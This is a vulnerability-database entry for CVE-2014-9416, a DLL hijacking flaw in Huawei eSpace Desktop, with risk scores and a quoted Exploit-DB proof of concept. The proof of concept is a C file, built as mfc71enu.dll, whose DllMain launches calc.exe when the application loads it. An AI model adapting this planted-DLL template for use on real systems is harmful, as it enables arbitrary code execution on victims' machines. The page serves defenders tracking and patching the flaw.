CVE-2014-9416

medium

Published 2014-12-24 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.4

Description

Multiple untrusted search path vulnerabilities in Huawei eSpace Desktop before V200R003C00 allow local users to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) mfc71enu.dll, (2) mfc71loc.dll, (3) tcapi.dll, or (4) airpcap.dll.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-46866 local windows text · 2 KB

LiquidWorm · 2019-05-20

Huawei eSpace 1.1.11.103 - DLL Hijacking

text exploit Source: Exploit-DB

/*

Huawei eSpace Desktop DLL Hijacking Vulnerability


Vendor: Huawei Technologies Co., Ltd.
Product web page: https://www.huawei.com
Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)

Summary: Create more convenient Enhanced Communications (EC) services for your
enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
voice, data, video, and service streams, and provides users with easy and secure
access to their service platform from any device, in any place, at any time. The
eSpace Meeting allows you to join meetings that support voice, data, and video
functions using the PC client, the tablet client, or an IP phone, or in a meeting
room with an MT deployed.

Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and 
airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application file (.html, .jpg, .png)
located on a remote WebDAV or SMB share.

Tested on: Microsoft Windows 7 Professional


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

19.08.2014

Patched version: V200R003C00
Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
CVE ID: CVE-2014-9416
Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589

*/


// gcc -shared -o mfc71enu.dll exploit.c

#include <windows.h> 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
	exec();
	return 0;
}

int exec()
{
	WinExec("calc.exe" , SW_NORMAL);
	return 0;
}

Application impact

Vendor	Product	Versions	Fixed
huawei	espace_desktop	`{"endIncluding":"v200r003c00"}`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.